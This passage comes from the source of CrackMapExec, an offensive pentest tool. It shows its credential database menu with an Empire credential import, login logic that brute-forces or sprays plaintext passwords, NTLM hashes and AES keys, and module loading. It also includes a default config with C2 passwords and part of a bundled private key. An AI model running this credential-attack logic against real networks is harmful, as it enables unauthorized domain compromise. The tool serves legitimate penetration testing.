print("[-] Invalid argument, specify creds, hosts, local_admins, shares, wcc or dpapi")
@staticmethod
def help_export():
help_string = """
export [creds|hosts|local_admins|shares|signing|keys] [simple|detailed|*] [filename]
Exports information to a specified file
* hosts has an additional third option from simple and detailed: signing - this simply writes a list of ips of
hosts where signing is enabled
* keys' third option is either "all" or an id of a key to export
export keys [all|id] [filename]
"""
print_help(help_string)
def do_import(self, line):
if not line:
return
if line == "empire":
headers = {"Content-Type": "application/json"}
# Pull the username and password from the config file
payload = {
"username": self.config.get("Empire", "username"),
"password": self.config.get("Empire", "password"),
}
# Pull the host and port from the config file
base_url = f"https://{self.config.get('Empire', 'api_host')}:{self.config.get('Empire', 'api_port')}"
try:
r = post(
base_url + "/api/admin/login",
json=payload,
headers=headers,
verify=False,
)
if r.status_code == 200:
token = r.json()["token"]
url_params = {"token": token}
r = get(
base_url + "/api/creds",
headers=headers,
params=url_params,
verify=False,
)
creds = r.json()
for cred in creds["creds"]:
if cred["credtype"] == "token" or cred["credtype"] == "krbtgt" or cred["username"].endswith("$"):
continue
self.db.add_credential(
cred["credtype"],
cred["domain"],
cred["username"],
cred["password"],
)
print("[+] Empire credential import successful")
else:
print("[-] Error authenticating to Empire's RESTful API server!")
except ConnectionError as e:
print(f"[-] Unable to connect to Empire's RESTful API server: {e}")
class CMEDBMenu(cmd.Cmd):
def __init__(self, config_path):
cmd.Cmd.__init__(self)
self.config_path = config_path
try:
self.config = configparser.ConfigParser()
self.config.read(self.config_path)
except Exception as e:
print(f"[-] Error reading cme.conf: {e}")
sys.exit(1)
self.conn = None
self.p_loader = ProtocolLoader()
self.protocols = self.p_loader.get_protocols()
self.workspace = self.config.get("CME", "workspace")
self.do_workspace(self.workspace)
self.db = self.config.get("CME", "last_used_db")
if self.db:
self.do_proto(self.db)
def write_configfile(self):
with open(self.config_path, "w") as configfile:
self.config.write(configfile)
def do_proto(self, proto):
if not proto:
return
proto_db_path = path_join(WORKSPACE_DIR, self.workspace, f"{proto}.db")
if exists(proto_db_path):
self.conn = create_db_engine(proto_db_path)
db_nav_object = self.p_loader.load_protocol(self.protocols[proto]["nvpath"])
db_object = self.p_loader.load_protocol(self.protocols[proto]["dbpath"])
self.config.set("CME", "last_used_db", proto)
self.write_configfile()
try:
proto_menu = getattr(db_nav_object, "navigator")(self, getattr(db_object, "database")(self.conn), proto)
proto_menu.cmdloop()
except UserExitedProto:
pass
@staticmethod
def help_proto():
help_string = """
proto [smb|mssql|winrm]
*unimplemented protocols: ftp, rdp, ldap, ssh
Changes cmedb to the specified protocol
"""
print_help(help_string)
def do_workspace(self, line):
line = line.strip()
if not line:
subcommand = ""
self.help_workspace()
else:
subcommand = line.split()[0]
if subcommand == "create":
new_workspace = line.split()[1].strip()
print(f"[*] Creating workspace '{new_workspace}'")
self.create_workspace(new_workspace, self.p_loader, self.protocols)
self.do_workspace(new_workspace)
elif subcommand == "list":
print("[*] Enumerating Workspaces")
for workspace in listdir(path_join(WORKSPACE_DIR)):
if workspace == self.workspace:
print("==> " + workspace)
else:
print(workspace)
elif exists(path_join(WORKSPACE_DIR, line)):
self.config.set("CME", "workspace", line)
self.write_configfile()
self.workspace = line
self.prompt = f"cmedb ({line}) > "
@staticmethod
def help_workspace():
help_string = """
workspace [create | workspace list | workspace ]
"""
print_help(help_string)
@staticmethod
def do_exit(line):
sys.exit()
@staticmethod
def help_exit():
help_string = """
Exits
"""
print_help(help_string)
@staticmethod
def create_workspace(workspace_name, p_loader, protocols):
os.mkdir(path_join(WORKSPACE_DIR, workspace_name))
for protocol in protocols.keys():
protocol_object = p_loader.load_protocol(protocols[protocol]["dbpath"])
proto_db_path = path_join(WORKSPACE_DIR, workspace_name, f"{protocol}.db")
if not exists(proto_db_path):
print(f"[*] Initializing {protocol.upper()} protocol database")
conn = connect(proto_db_path)
c = conn.cursor()
# try to prevent some weird sqlite I/O errors
c.execute("PRAGMA journal_mode = OFF")
c.execute("PRAGMA foreign_keys = 1")
getattr(protocol_object, "database").db_schema(c)
# commit the changes and close everything off
conn.commit()
conn.close()
def delete_workspace(workspace_name):
shutil.rmtree(path_join(WORKSPACE_DIR, workspace_name))
def initialize_db(logger):
if not exists(path_join(WS_PATH, "default")):
logger.debug("Creating default workspace")
os.mkdir(path_join(WS_PATH, "default"))
p_loader = ProtocolLoader()
protocols = p_loader.get_protocols()
for protocol in protocols.keys():
protocol_object = p_loader.load_protocol(protocols[protocol]["dbpath"])
proto_db_path = path_join(WS_PATH, "default", f"{protocol}.db")
if not exists(proto_db_path):
logger.debug(f"Initializing {protocol.upper()} protocol database")
conn = connect(proto_db_path)
c = conn.cursor()
# try to prevent some weird sqlite I/O errors
c.execute("PRAGMA journal_mode = OFF") # could try setting to PERSIST if DB corruption starts occurring
c.execute("PRAGMA foreign_keys = 1")
# set a small timeout (5s) so if another thread is writing to the database, the entire program doesn't crash
c.execute("PRAGMA busy_timeout = 5000")
getattr(protocol_object, "database").db_schema(c)
# commit the changes and close everything off
conn.commit()
conn.close()
def main():
if not exists(CONFIG_PATH):
print("[-] Unable to find config file")
sys.exit(1)
try:
cmedbnav = CMEDBMenu(CONFIG_PATH)
cmedbnav.cmdloop()
except KeyboardInterrupt:
pass
if __name__ == "__main__":
main()
================================================
FILE: cme/config.py
================================================
# coding=utf-8
import os
from os.path import join as path_join
import configparser
from cme.paths import CME_PATH, DATA_PATH
from cme.first_run import first_run_setup
from cme.logger import cme_logger
from ast import literal_eval
cme_default_config = configparser.ConfigParser()
cme_default_config.read(path_join(DATA_PATH, "cme.conf"))
cme_config = configparser.ConfigParser()
cme_config.read(os.path.join(CME_PATH, "cme.conf"))
if "CME" not in cme_config.sections():
first_run_setup()
cme_config.read(os.path.join(CME_PATH, "cme.conf"))
# Check if there are any missing options in the config file
for section in cme_default_config.sections():
for option in cme_default_config.options(section):
if not cme_config.has_option(section, option):
cme_logger.display(f"Adding missing option '{option}' in config section '{section}' to cme.conf")
cme_config.set(section, option, cme_default_config.get(section, option))
with open(path_join(CME_PATH, "cme.conf"), "w") as config_file:
cme_config.write(config_file)
#!!! THESE OPTIONS HAVE TO EXIST IN THE DEFAULT CONFIG FILE !!!
cme_workspace = cme_config.get("CME", "workspace", fallback="default")
pwned_label = cme_config.get("CME", "pwn3d_label", fallback="Pwn3d!")
audit_mode = cme_config.get("CME", "audit_mode", fallback=False)
reveal_chars_of_pwd = int(cme_config.get("CME", "reveal_chars_of_pwd", fallback=0))
config_log = cme_config.getboolean("CME", "log_mode", fallback=False)
ignore_opsec = cme_config.getboolean("CME", "ignore_opsec", fallback=False)
host_info_colors = literal_eval(cme_config.get("CME", "host_info_colors", fallback=["green", "red", "yellow", "cyan"]))
if len(host_info_colors) != 4:
cme_logger.error("Config option host_info_colors must have 4 values! Using default values.")
host_info_colors = cme_default_config.get("CME", "host_info_colors")
# this should probably be put somewhere else, but if it's in the config helpers, there is a circular import
def process_secret(text):
hidden = text[:reveal_chars_of_pwd]
return text if not audit_mode else hidden+audit_mode * 8
================================================
FILE: cme/connection.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import random
import socket
from socket import AF_INET, AF_INET6, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME
from socket import getaddrinfo
from os.path import isfile
from threading import BoundedSemaphore
from functools import wraps
from time import sleep
from ipaddress import ip_address
from cme.config import pwned_label
from cme.helpers.logger import highlight
from cme.logger import cme_logger, CMEAdapter
from cme.context import Context
from impacket.dcerpc.v5 import transport
sem = BoundedSemaphore(1)
global_failed_logins = 0
user_failed_logins = {}
def gethost_addrinfo(hostname):
try:
for res in getaddrinfo( hostname, None, AF_INET6, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME):
af, socktype, proto, canonname, sa = res
host = canonname if ip_address(sa[0]).is_link_local else sa[0]
except socket.gaierror:
for res in getaddrinfo( hostname, None, AF_INET, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME):
af, socktype, proto, canonname, sa = res
host = sa[0] if sa[0] else canonname
return host
def requires_admin(func):
def _decorator(self, *args, **kwargs):
if self.admin_privs is False:
return
return func(self, *args, **kwargs)
return wraps(func)(_decorator)
def dcom_FirewallChecker(iInterface, timeout):
stringBindings = iInterface.get_cinstance().get_string_bindings()
for strBinding in stringBindings:
if strBinding['wTowerId'] == 7:
if strBinding['aNetworkAddr'].find('[') >= 0:
binding, _, bindingPort = strBinding['aNetworkAddr'].partition('[')
bindingPort = '[' + bindingPort
else:
binding = strBinding['aNetworkAddr']
bindingPort = ''
if binding.upper().find(iInterface.get_target().upper()) >= 0:
stringBinding = 'ncacn_ip_tcp:' + strBinding['aNetworkAddr'][:-1]
break
elif iInterface.is_fqdn() and binding.upper().find(iInterface.get_target().upper().partition('.')[0]) >= 0:
stringBinding = 'ncacn_ip_tcp:%s%s' % (iInterface.get_target(), bindingPort)
if "stringBinding" not in locals():
return True, None
try:
rpctransport = transport.DCERPCTransportFactory(stringBinding)
rpctransport.set_connect_timeout(timeout)
rpctransport.connect()
rpctransport.disconnect()
except:
return False, stringBinding
else:
return True, stringBinding
class connection(object):
def __init__(self, args, db, host):
self.domain = None
self.args = args
self.db = db
self.hostname = host
self.conn = None
self.admin_privs = False
self.password = ""
self.username = ""
self.kerberos = True if self.args.kerberos or self.args.use_kcache or self.args.aesKey else False
self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
self.kdcHost = None if not self.args.kdcHost else self.args.kdcHost
self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache
self.failed_logins = 0
self.local_ip = None
self.logger = cme_logger
try:
self.host = gethost_addrinfo(self.hostname)
if self.args.kerberos:
self.host = self.hostname
self.logger.info(f"Socket info: host={self.host}, hostname={self.hostname}, kerberos={ 'True' if self.args.kerberos else 'False' }")
except Exception as e:
self.logger.info(f"Error resolving hostname {self.hostname}: {e}")
return
if args.jitter:
jitter = args.jitter
if "-" in jitter:
start, end = jitter.split("-")
jitter = (int(start), int(end))
else:
jitter = (0, int(jitter))
value = random.choice(range(jitter[0], jitter[1]))
self.logger.debug(f"Doin' the jitterbug for {value} second(s)")
sleep(value)
try:
self.proto_flow()
except Exception as e:
self.logger.exception(f"Exception while calling proto_flow() on target {self.host}: {e}")
@staticmethod
def proto_args(std_parser, module_parser):
return
def proto_logger(self):
pass
def enum_host_info(self):
return
def print_host_info(self):
return
def create_conn_obj(self):
return
def check_if_admin(self):
return
def kerberos_login(
self,
domain,
username,
password="",
ntlm_hash="",
aesKey="",
kdcHost="",
useCache=False,
):
return
def plaintext_login(self, domain, username, password):
return
def hash_login(self, domain, username, ntlm_hash):
return
def proto_flow(self):
self.logger.debug(f"Kicking off proto_flow")
self.proto_logger()
if self.create_conn_obj():
self.enum_host_info()
if self.print_host_info():
# because of null session
if self.login() or (self.username == "" and self.password == ""):
if hasattr(self.args, "module") and self.args.module:
self.call_modules()
else:
self.call_cmd_args()
def call_cmd_args(self):
for k, v in vars(self.args).items():
if hasattr(self, k) and hasattr(getattr(self, k), "__call__"):
if v is not False and v is not None:
self.logger.debug(f"Calling {k}()")
r = getattr(self, k)()
def call_modules(self):
for module in self.module:
self.logger.debug(f"Loading module {module.name} - {module}")
module_logger = CMEAdapter(
extra={
"module_name": module.name.upper(),
"host": self.host,
"port": self.args.port,
"hostname": self.hostname,
},
)
self.logger.debug(f"Loading context for module {module.name} - {module}")
context = Context(self.db, module_logger, self.args)
context.localip = self.local_ip
if hasattr(module, "on_request") or hasattr(module, "has_response"):
self.logger.debug(f"Module {module.name} has on_request or has_response methods")
self.server.connection = self
self.server.context.localip = self.local_ip
if hasattr(module, "on_login"):
self.logger.debug(f"Module {module.name} has on_login method")
module.on_login(context, self)
if self.admin_privs and hasattr(module, "on_admin_login"):
self.logger.debug(f"Module {module.name} has on_admin_login method")
module.on_admin_login(context, self)
if (not hasattr(module, "on_request") and not hasattr(module, "has_response")) and hasattr(module, "on_shutdown"):
self.logger.debug(f"Module {module.name} has on_shutdown method")
module.on_shutdown(context, self)
def inc_failed_login(self, username):
global global_failed_logins
global user_failed_logins
if username not in user_failed_logins.keys():
user_failed_logins[username] = 0
user_failed_logins[username] += 1
global_failed_logins += 1
self.failed_logins += 1
def over_fail_limit(self, username):
global global_failed_logins
global user_failed_logins
if global_failed_logins == self.args.gfail_limit:
return True
if self.failed_logins == self.args.fail_limit:
return True
if username in user_failed_logins.keys():
if self.args.ufail_limit == user_failed_logins[username]:
return True
return False
def query_db_creds(self):
"""
Queries the database for credentials to be used for authentication.
Valid cred_id values are:
- a single cred_id
- a range specified with a dash (ex. 1-5)
- 'all' to select all credentials
:return: domain[], username[], owned[], secret[], cred_type[]
"""
domain = []
username = []
owned = []
secret = []
cred_type = []
creds = [] # list of tuples (cred_id, domain, username, secret, cred_type, pillaged_from) coming from the database
data = [] # Arbitrary data needed for the login, e.g. ssh_key
for cred_id in self.args.cred_id:
if isinstance(cred_id, str) and cred_id.lower() == 'all':
creds = self.db.get_credentials()
else:
if not self.db.get_credentials(filter_term=int(cred_id)):
self.logger.error('Invalid database credential ID {}!'.format(cred_id))
continue
creds.extend(self.db.get_credentials(filter_term=int(cred_id)))
for cred in creds:
c_id, domain_single, username_single, secret_single, cred_type_single, pillaged_from = cred
domain.append(domain_single)
username.append(username_single)
owned.append(False) # As these are likely valid we still want to test them if they are specified in the command line
secret.append(secret_single)
cred_type.append(cred_type_single)
if len(secret) != len(data): data = [None] * len(secret)
return domain, username, owned, secret, cred_type, data
def parse_credentials(self):
"""
Parse credentials from the command line or from a file specified.
Usernames can be specified with a domain (domain\\username) or without (username).
If the file contains domain\\username the domain specified will be overwritten by the one in the file.
:return: domain[], username[], owned[], secret[], cred_type[]
"""
domain = []
username = []
owned = []
secret = []
cred_type = []
# Parse usernames
for user in self.args.username:
if isfile(user):
with open(user, 'r') as user_file:
for line in user_file:
if "\\" in line:
domain_single, username_single = line.split("\\")
else:
domain_single = self.args.domain if hasattr(self.args, "domain") and self.args.domain else self.domain
username_single = line
domain.append(domain_single)
username.append(username_single.strip())
owned.append(False)
else:
if "\\" in user:
domain_single, username_single = user.split("\\")
else:
domain_single = self.args.domain if hasattr(self.args, "domain") and self.args.domain else self.domain
username_single = user
domain.append(domain_single)
username.append(username_single)
owned.append(False)
# Parse passwords
for password in self.args.password:
if isfile(password):
with open(password, 'r') as password_file:
for line in password_file:
secret.append(line.strip())
cred_type.append('plaintext')
else:
secret.append(password)
cred_type.append('plaintext')
# Parse NTLM-hashes
if hasattr(self.args, "hash") and self.args.hash:
for ntlm_hash in self.args.hash:
if isfile(ntlm_hash):
with open(ntlm_hash, 'r') as ntlm_hash_file:
for line in ntlm_hash_file:
secret.append(line.strip())
cred_type.append('hash')
else:
secret.append(ntlm_hash)
cred_type.append('hash')
# Parse AES keys
if self.args.aesKey:
for aesKey in self.args.aesKey:
if isfile(aesKey):
with open(aesKey, 'r') as aesKey_file:
for line in aesKey_file:
secret.append(line.strip())
cred_type.append('aesKey')
else:
secret.append(aesKey)
cred_type.append('aesKey')
return domain, username, owned, secret, cred_type, [None] * len(secret)
def try_credentials(self, domain, username, owned, secret, cred_type, data=None):
"""
Try to login using the specified credentials and protocol.
Possible login methods are:
- plaintext (/kerberos)
- NTLM-hash (/kerberos)
- AES-key
"""
if self.over_fail_limit(username):
return False
if self.args.continue_on_success and owned:
return False
# Enforcing FQDN for SMB if not using local authentication. Related issues/PRs: #26, #28, #24, #38
if self.args.protocol == 'smb' and not self.args.local_auth and "." not in domain and not self.args.laps and secret != "" and not (self.domain.upper() == self.hostname.upper()) :
self.logger.error(f"Domain {domain} for user {username.rstrip()} need to be FQDN ex:domain.local, not domain")
return False
with sem:
if cred_type == 'plaintext':
if self.args.kerberos:
return self.kerberos_login(domain, username, secret, '', '', self.kdcHost, False)
elif hasattr(self.args, "domain"): # Some protocolls don't use domain for login
return self.plaintext_login(domain, username, secret)
elif self.args.protocol == 'ssh':
return self.plaintext_login(username, secret, data)
else:
return self.plaintext_login(username, secret)
elif cred_type == 'hash':
if self.args.kerberos:
return self.kerberos_login(domain, username, '', secret, '', self.kdcHost, False)
return self.hash_login(domain, username, secret)
elif cred_type == 'aesKey':
return self.kerberos_login(domain, username, '', '', secret, self.kdcHost, False)
def login(self):
"""
Try to login using the credentials specified in the command line or in the database.
:return: True if the login was successful and "--continue-on-success" was not specified, False otherwise.
"""
# domain[n] always corresponds to username[n] and owned [n]
domain = []
username = []
owned = [] # Determines whether we have found a valid credential for this user. Default: False
# secret[n] always corresponds to cred_type[n]
secret = []
cred_type = []
data = [] # Arbitrary data needed for the login, e.g. ssh_key
if self.args.cred_id:
db_domain, db_username, db_owned, db_secret, db_cred_type, db_data = self.query_db_creds()
domain.extend(db_domain)
username.extend(db_username)
owned.extend(db_owned)
secret.extend(db_secret)
cred_type.extend(db_cred_type)
data.extend(db_data)
if self.args.username:
parsed_domain, parsed_username, parsed_owned, parsed_secret, parsed_cred_type, parsed_data = self.parse_credentials()
domain.extend(parsed_domain)
username.extend(parsed_username)
owned.extend(parsed_owned)
secret.extend(parsed_secret)
cred_type.extend(parsed_cred_type)
data.extend(parsed_data)
if self.args.use_kcache:
with sem:
username = self.args.username[0] if len(self.args.username) else ""
password = self.args.password[0] if len(self.args.password) else ""
self.kerberos_login(self.domain, username, password, "", "", self.kdcHost, True)
self.logger.info("Successfully authenticated using Kerberos cache")
return True
if not self.args.no_bruteforce:
for secr_index, secr in enumerate(secret):
for user_index, user in enumerate(username):
if self.try_credentials(domain[user_index], user, owned[user_index], secr, cred_type[secr_index], data[secr_index]):
owned[user_index] = True
if not self.args.continue_on_success:
return True
else:
if len(username) != len(secret):
self.logger.error("Number provided of usernames and passwords/hashes do not match!")
return False
for user_index, user in enumerate(username):
if self.try_credentials(domain[user_index], user, owned[user_index], secret[user_index], cred_type[user_index], data[user_index]) and not self.args.continue_on_success:
owned[user_index] = True
if not self.args.continue_on_success:
return True
def mark_pwned(self):
return highlight(f"({pwned_label})" if self.admin_privs else "")
================================================
FILE: cme/console.py
================================================
from rich.console import Console
cme_console = Console(soft_wrap=True, tab_size=4)
================================================
FILE: cme/context.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import configparser
import os
class Context:
def __init__(self, db, logger, args):
for key, value in vars(args).items():
setattr(self, key, value)
self.db = db
self.log_folder_path = os.path.join(os.path.expanduser("~/.cme"), "logs")
self.localip = None
self.conf = configparser.ConfigParser()
self.conf.read(os.path.expanduser("~/.cme/cme.conf"))
self.log = logger
# self.log.debug = logging.debug
================================================
FILE: cme/crackmapexec.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cme.helpers.logger import highlight
from cme.helpers.misc import identify_target_file
from cme.parsers.ip import parse_targets
from cme.parsers.nmap import parse_nmap_xml
from cme.parsers.nessus import parse_nessus_file
from cme.cli import gen_cli_args
from cme.loaders.protocolloader import ProtocolLoader
from cme.loaders.moduleloader import ModuleLoader
from cme.servers.http import CMEServer
from cme.first_run import first_run_setup
from cme.context import Context
from cme.paths import CME_PATH, DATA_PATH
from cme.console import cme_console
from cme.logger import cme_logger
from cme.config import cme_config, cme_workspace, config_log, ignore_opsec
from concurrent.futures import ThreadPoolExecutor, as_completed
import asyncio
import cme.helpers.powershell as powershell
import shutil
import webbrowser
import random
import os
from os.path import exists
from os.path import join as path_join
from sys import exit
import logging
import sqlalchemy
from rich.progress import Progress
from sys import platform
# Increase file_limit to prevent error "Too many open files"
if platform != "win32":
import resource
file_limit = list(resource.getrlimit(resource.RLIMIT_NOFILE))
if file_limit[1] > 10000:
file_limit[0] = 10000
else:
file_limit[0] = file_limit[1]
file_limit = tuple(file_limit)
resource.setrlimit(resource.RLIMIT_NOFILE, file_limit)
try:
import librlers
except:
print("Incompatible python version, try with another python version or another binary 3.8 / 3.9 / 3.10 / 3.11 that match your python version (python -V)")
exit(1)
def create_db_engine(db_path):
db_engine = sqlalchemy.create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True)
return db_engine
async def start_run(protocol_obj, args, db, targets):
cme_logger.debug(f"Creating ThreadPoolExecutor")
if args.no_progress or len(targets) == 1:
with ThreadPoolExecutor(max_workers=args.threads + 1) as executor:
cme_logger.debug(f"Creating thread for {protocol_obj}")
_ = [executor.submit(protocol_obj, args, db, target) for target in targets]
else:
with Progress(console=cme_console) as progress:
with ThreadPoolExecutor(max_workers=args.threads + 1) as executor:
current = 0
total = len(targets)
tasks = progress.add_task(
f"[green]Running CME against {total} {'target' if total == 1 else 'targets'}",
total=total,
)
cme_logger.debug(f"Creating thread for {protocol_obj}")
futures = [executor.submit(protocol_obj, args, db, target) for target in targets]
for _ in as_completed(futures):
current += 1
progress.update(tasks, completed=current)
def main():
first_run_setup(cme_logger)
root_logger = logging.getLogger("root")
args = gen_cli_args()
if args.verbose:
cme_logger.logger.setLevel(logging.INFO)
root_logger.setLevel(logging.INFO)
elif args.debug:
cme_logger.logger.setLevel(logging.DEBUG)
root_logger.setLevel(logging.DEBUG)
else:
cme_logger.logger.setLevel(logging.ERROR)
root_logger.setLevel(logging.ERROR)
# if these are the same, it might double log to file (two FileHandlers will be added)
# but this should never happen by accident
if config_log:
cme_logger.add_file_log()
if hasattr(args, "log") and args.log:
cme_logger.add_file_log(args.log)
cme_logger.debug(f"Passed args: {args}")
# FROM HERE ON A PROTOCOL IS REQUIRED
if not args.protocol:
exit(1)
if args.protocol == "ssh":
if args.key_file:
if not args.password:
cme_logger.fail(f"Password is required, even if a key file is used - if no passphrase for key, use `-p ''`")
exit(1)
if args.use_kcache and not os.environ.get("KRB5CCNAME"):
cme_logger.error("KRB5CCNAME environment variable is not set")
exit(1)
module_server = None
targets = []
server_port_dict = {"http": 80, "https": 443, "smb": 445}
if hasattr(args, "cred_id") and args.cred_id:
for cred_id in args.cred_id:
if "-" in str(cred_id):
start_id, end_id = cred_id.split("-")
try:
for n in range(int(start_id), int(end_id) + 1):
args.cred_id.append(n)
args.cred_id.remove(cred_id)
except Exception as e:
cme_logger.error(f"Error parsing database credential id: {e}")
exit(1)
if hasattr(args, "target") and args.target:
for target in args.target:
if exists(target) and os.path.isfile(target):
target_file_type = identify_target_file(target)
if target_file_type == "nmap":
targets.extend(parse_nmap_xml(target, args.protocol))
elif target_file_type == "nessus":
targets.extend(parse_nessus_file(target, args.protocol))
else:
with open(target, "r") as target_file:
for target_entry in target_file:
targets.extend(parse_targets(target_entry.strip()))
else:
targets.extend(parse_targets(target))
# The following is a quick hack for the powershell obfuscation functionality, I know this is yucky
if hasattr(args, "clear_obfscripts") and args.clear_obfscripts:
shutil.rmtree(os.path.expanduser("~/.cme/obfuscated_scripts/"))
os.mkdir(os.path.expanduser("~/.cme/obfuscated_scripts/"))
cme_logger.success("Cleared cached obfuscated PowerShell scripts")
if hasattr(args, "obfs") and args.obfs:
powershell.obfuscate_ps_scripts = True
cme_logger.debug(f"Protocol: {args.protocol}")
p_loader = ProtocolLoader()
protocol_path = p_loader.get_protocols()[args.protocol]["path"]
cme_logger.debug(f"Protocol Path: {protocol_path}")
protocol_db_path = p_loader.get_protocols()[args.protocol]["dbpath"]
cme_logger.debug(f"Protocol DB Path: {protocol_db_path}")
protocol_object = getattr(p_loader.load_protocol(protocol_path), args.protocol)
cme_logger.debug(f"Protocol Object: {protocol_object}")
protocol_db_object = getattr(p_loader.load_protocol(protocol_db_path), "database")
cme_logger.debug(f"Protocol DB Object: {protocol_db_object}")
db_path = path_join(CME_PATH, "workspaces", cme_workspace, f"{args.protocol}.db")
cme_logger.debug(f"DB Path: {db_path}")
db_engine = create_db_engine(db_path)
db = protocol_db_object(db_engine)
# with the new cme/config.py this can be eventually removed, as it can be imported anywhere
setattr(protocol_object, "config", cme_config)
if args.module or args.list_modules:
loader = ModuleLoader(args, db, cme_logger)
modules = loader.list_modules()
if args.list_modules:
for name, props in sorted(modules.items()):
if args.protocol in props["supported_protocols"]:
cme_logger.display(f"{name:<25} {props['description']}")
exit(0)
elif args.module and args.show_module_options:
for module in args.module:
cme_logger.display(f"{module} module options:\n{modules[module]['options']}")
exit(0)
elif args.module:
cme_logger.debug(f"Modules to be Loaded: {args.module}, {type(args.module)}")
for m in map(str.lower, args.module):
if m not in modules:
cme_logger.error(f"Module not found: {m}")
exit(1)
cme_logger.debug(f"Loading module {m} at path {modules[m]['path']}")
module = loader.init_module(modules[m]["path"])
if not module.opsec_safe:
if ignore_opsec:
cme_logger.debug(f"ignore_opsec is set in the configuration, skipping prompt")
cme_logger.display(f"Ignore OPSEC in configuration is set and OPSEC unsafe module loaded")
else:
ans = input(
highlight(
"[!] Module is not opsec safe, are you sure you want to run this? [Y/n] For global configuration, change ignore_opsec value to True on ~/cme/cme.conf",
"red",
)
)
if ans.lower() not in ["y", "yes", ""]:
exit(1)
if not module.multiple_hosts and len(targets) > 1:
ans = input(
highlight(
"[!] Running this module on multiple hosts doesn't really make any sense, are you sure you want to continue? [Y/n] ",
"red",
)
)
if ans.lower() not in ["y", "yes", ""]:
exit(1)
if hasattr(module, "on_request") or hasattr(module, "has_response"):
if hasattr(module, "required_server"):
args.server = module.required_server
if not args.server_port:
args.server_port = server_port_dict[args.server]
# loading a module server multiple times will obviously fail
try:
context = Context(db, cme_logger, args)
module_server = CMEServer(
module,
context,
cme_logger,
args.server_host,
args.server_port,
args.server,
)
module_server.start()
protocol_object.server = module_server.server
except Exception as e:
cme_logger.error(f"Error loading module server for {module}: {e}")
cme_logger.debug(f"proto_object: {protocol_object}, type: {type(protocol_object)}")
cme_logger.debug(f"proto object dir: {dir(protocol_object)}")
# get currently set modules, otherwise default to empty list
current_modules = getattr(protocol_object, "module", [])
current_modules.append(module)
setattr(protocol_object, "module", current_modules)
cme_logger.debug(f"proto object module after adding: {protocol_object.module}")
if hasattr(args, "ntds") and args.ntds and not args.userntds:
ans = input(
highlight(
"[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user to dump a specific user safely or the module -M ntdsutil [Y/n] ",
"red",
)
)
if ans.lower() not in ["y", "yes", ""]:
exit(1)
try:
asyncio.run(start_run(protocol_object, args, db, targets))
except KeyboardInterrupt:
cme_logger.debug("Got keyboard interrupt")
finally:
if module_server:
module_server.shutdown()
db_engine.dispose()
if __name__ == "__main__":
main()
================================================
FILE: cme/data/cme.conf
================================================
[CME]
workspace = default
last_used_db = smb
pwn3d_label = Pwn3d!
audit_mode =
reveal_chars_of_pwd = 0
log_mode = False
ignore_opsec = True
host_info_colors = ["green", "red", "yellow", "cyan"]
[BloodHound]
bh_enabled = False
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = neo4j
bh_pass = neo4j
[Empire]
api_host = 127.0.0.1
api_port = 1337
username = empireadmin
password = password123
[Metasploit]
rpc_host = 127.0.0.1
rpc_port = 55552
password = abc123
================================================
FILE: cme/data/default.pem
================================================
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDLRxCDVVXmjcFW
rvuwIZh6ywLNtffsTFQ2QAykUTl6CGzn+rpoz/s/AX7s2/dWkv+pcUULNNeH2Ae9
YNhM7vQqDzKA4Rj1FzVO9LIQot3F32e9SQWk2zJ0dia3uaxrrZTQeLOpISa9g3Q0
nnvflX2KjarZ/OUrxSJA3HRgx0C0N7bmyC/jXSeM8cLQxJjIdNpxeMfSA5koeEEJ
hzaWZLgtJpX5NOxpeJBRfhPSOL3r2t2qUGnzctvHbPZmdyRwIRCAiJNSHZd+CirC
ayplzdaxDZ0rlMcpaeodOTpusBLmAWEP6uQEKrRBgL+AVOo7DpncIbmMQPkSA3La
Slyh+dgRAgMBAAECggEBAJW58l/KK0t2fkHrAVfqZvWLMrVyovpZ/m03IBin+z33
lsAH3eX1y4nNAEBWhQgvnkCgPcrTUS2t4YWMH8YK+60/JGPpaQid35YYhk/app9o
vnCdqJqVGcTOghYxnN5zLHmhbjPVR0Ov35giY/t7kMzNLFsD+4kR2vkLaG0gVnhm
gAZ0M7bN35LQT0Wk1SFjVPLwdsPb/Jvxo7ly7wVv7Y2D1vNCYoBQGoFL7/noGene
mMQ+OVawP58KqoYn/WRLI9zmTWzohXvYJYvm+SiXultB4aBGgp4saYjD8gwSOBml
wbz2LyRCcDVi46yDcy7iSLmMr6c4ZdkUpxRvtPJI5wECgYEA+AgBrSdOoU+pzPas
HlrprQEn5XHn990wfJj5N77MtpJu7Gmf/0tWGQQ3wohmu8dfNZrE8ZsEupRUVIYh
5mLOWMmujkjNpp6A5LzZcp3hnLklORoUirZka66QgC9RSYv08PlPLy7ru+aHYsg1
uPZNcf+KgpQoCg10LFrXaCh8GlUCgYEA0c74b1Rxg2+Dr3pGfvoZcQhtg1FUOWR9
poNFkkV7vAnzoR9xLDvRtsOcGL7fu/WDtBg/XsddzfaKtU2cE05cF888OV+TYs6U
Cturp+pz+Yyslh6x3AgygnpMGJp6rk5D9LLHmIWPpCPjbBSofEQL9IxKoQOYOlvm
7VrBu7Kbus0CgYAD6NRl702s+z147pZt8A7o3DDNzArU/FaMUDj1aPt/ETXQYiXU
d1KHGGrslQvRf+X/SU47ZK8hZb8iie602+/WtG8c7QbYznzHnjZrORPaTYzJpqCW
QyO4EstSSeylFSCqP7PA0aODlbGim/dE0BUOa/G59y3eYrHnFRN6H9E89QKBgHHK
+JGhUiPAYsLU5dFOomfc81Cq1qx+JWwffKdVykN1fk7gN8iO9TJUK6B8Peq6wWD3
Wb91EBp6YkbtPf52nJpJStevT8fiVQcCl7pt/dLWinCtWzgEtihwXj9l4a4SQuc/
4+OEZSDYWiuvlKY5XeaYBI4J3hGg8MHBXJwJxk7tAoGBALBrop1vJVxZt4+Eb9gv
